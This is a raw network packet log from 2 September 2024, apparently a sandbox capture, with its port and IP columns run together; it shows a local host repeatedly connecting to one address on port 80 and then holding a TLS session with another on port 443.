                                              Sep 2, 2024 11:42:46.152043104 CEST4975680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:46.152132988 CEST4975680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:46.152154922 CEST4975680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:46.156905890 CEST8049756102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:46.156917095 CEST8049756102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:47.094243050 CEST8049756102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:47.094651937 CEST8049756102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:47.094815016 CEST4975680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:47.094815969 CEST4975680192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:47.097012997 CEST4975780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:47.099617958 CEST8049756102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:47.101835966 CEST8049757102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:47.101907015 CEST4975780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:47.102015972 CEST4975780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:47.102040052 CEST4975780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:47.106797934 CEST8049757102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:47.106928110 CEST8049757102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.002998114 CEST8049757102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.003165007 CEST8049757102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.003225088 CEST4975780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.003263950 CEST4975780192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.005542994 CEST4975880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.008338928 CEST8049757102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.010647058 CEST8049758102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.010731936 CEST4975880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.010832071 CEST4975880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.010863066 CEST4975880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.016175032 CEST8049758102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.016184092 CEST8049758102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.936934948 CEST8049758102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.936969042 CEST8049758102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.937036037 CEST4975880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.937253952 CEST4975880192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.940087080 CEST4975980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.942172050 CEST8049758102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.945172071 CEST8049759102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.945374966 CEST4975980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.945523024 CEST4975980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.945555925 CEST4975980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:48.950577021 CEST8049759102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:48.950742960 CEST8049759102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:49.851730108 CEST8049759102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:49.853494883 CEST8049759102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:49.853565931 CEST4975980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:49.853615999 CEST4975980192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:49.856403112 CEST4976080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:49.860371113 CEST8049759102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:49.862483978 CEST8049760102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:49.862565041 CEST4976080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:49.862679005 CEST4976080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:49.862703085 CEST4976080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:49.867898941 CEST8049760102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:49.868019104 CEST8049760102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:50.783155918 CEST8049760102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:50.783221006 CEST8049760102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:50.783381939 CEST4976080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:50.783426046 CEST4976080192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:50.785754919 CEST4976180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:50.788283110 CEST8049760102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:50.790554047 CEST8049761102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:50.790729046 CEST4976180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:50.790874004 CEST4976180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:50.790896893 CEST4976180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:50.795694113 CEST8049761102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:50.796612978 CEST8049761102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:51.699743986 CEST8049761102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:51.699759007 CEST8049761102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:51.699970961 CEST4976180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:51.700370073 CEST4976180192.168.2.4102.189.104.201
                                              Sep 2, 2024 11:42:51.705219984 CEST8049761102.189.104.201192.168.2.4
                                              Sep 2, 2024 11:42:52.168559074 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.168592930 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.168695927 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.169302940 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.169317961 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.631964922 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.632145882 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.636589050 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.636596918 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.636977911 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.646902084 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.692498922 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.757829905 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.757869959 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.757909060 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.757936954 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.758042097 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.758042097 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.758069038 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.758476973 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.758517027 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.758529902 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.758538008 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.758585930 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.759217978 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.759351015 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.759392977 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.759402037 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.762629986 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.762677908 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.762686014 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.762696981 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.762746096 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.762753010 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.809359074 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.841746092 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.841813087 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.841847897 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842081070 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.842094898 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842152119 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842160940 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.842168093 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842227936 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.842346907 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842581987 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842628002 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.842634916 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842763901 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842798948 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842809916 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.842816114 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.842864037 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.842869997 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843276978 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843327999 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.843333006 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843408108 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843455076 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.843461037 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843734980 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843779087 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.843784094 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843838930 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.843880892 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.843890905 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.844433069 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.844465017 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.844486952 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.844495058 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.844542980 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.844547987 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.846712112 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.846764088 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.846771002 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.886265039 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.886356115 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.886368036 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.886424065 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.925982952 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926037073 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926049948 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926057100 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926086903 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926116943 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926147938 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926151991 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926175117 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926259995 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926311970 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926318884 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926372051 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926449060 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926507950 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926604033 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926657915 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926696062 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926748991 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.926877022 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.926923037 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.927341938 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.927396059 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.927439928 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.927495956 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.927726984 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.927781105 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.927818060 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.927874088 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.928700924 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.928755999 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.930998087 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.931032896 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.931057930 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.931065083 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.931092024 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.970364094 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.970417976 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:52.970427990 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:52.970472097 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010035992 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010117054 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010174036 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010210991 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010231972 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010238886 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010250092 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010251045 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010288954 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010299921 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010305882 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010344028 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010390997 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010441065 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010447979 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010493040 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010524988 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010572910 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010601044 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010643005 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010654926 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010659933 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010689020 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010874033 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010905027 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010921001 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.010927916 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.010952950 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011058092 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011102915 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011107922 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011133909 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011178017 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011183977 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011199951 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011271000 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011318922 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011324883 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011372089 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011396885 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011451006 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011450052 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011473894 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011502028 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011521101 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011637926 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011694908 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011713982 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011765957 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011861086 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011912107 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011919022 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.011924028 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.011965036 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012059927 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012108088 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012120962 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012125969 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012164116 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012178898 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012299061 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012326002 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012350082 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012356043 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012382030 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012386084 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012399912 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012403965 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012455940 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012639999 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012691021 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012816906 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012854099 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012868881 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012873888 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.012900114 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012917995 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.012995005 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.013042927 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.013087034 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.013130903 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.013144016 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.013195038 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094289064 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094357967 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094363928 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094381094 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094392061 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094413996 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094435930 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094468117 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094507933 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094512939 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094521046 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094544888 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094547987 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094592094 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094599009 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094640017 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094691038 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094723940 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094742060 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094748020 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094769001 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094790936 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094844103 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094898939 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.094953060 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.094985962 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095006943 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095011950 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095024109 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095098972 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095146894 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095151901 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095184088 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095206022 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095212936 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095230103 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095309973 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095340967 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095365047 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095371962 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095382929 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095447063 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095490932 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095498085 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095539093 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095561028 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095609903 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095621109 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095674992 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095696926 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095746040 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095755100 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095762968 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095793962 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095810890 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.095871925 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.095953941 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.096000910 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.096050978 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.096087933 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.096096992 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.096101999 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.096126080 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.096146107 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.096205950 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.096256971 CEST49763443192.168.2.4191.96.144.157
                                              Sep 2, 2024 11:42:53.096952915 CEST44349763191.96.144.157192.168.2.4
                                              Sep 2, 2024 11:42:53.097012043 CEST49763443192.168.2.4191.96.144.157
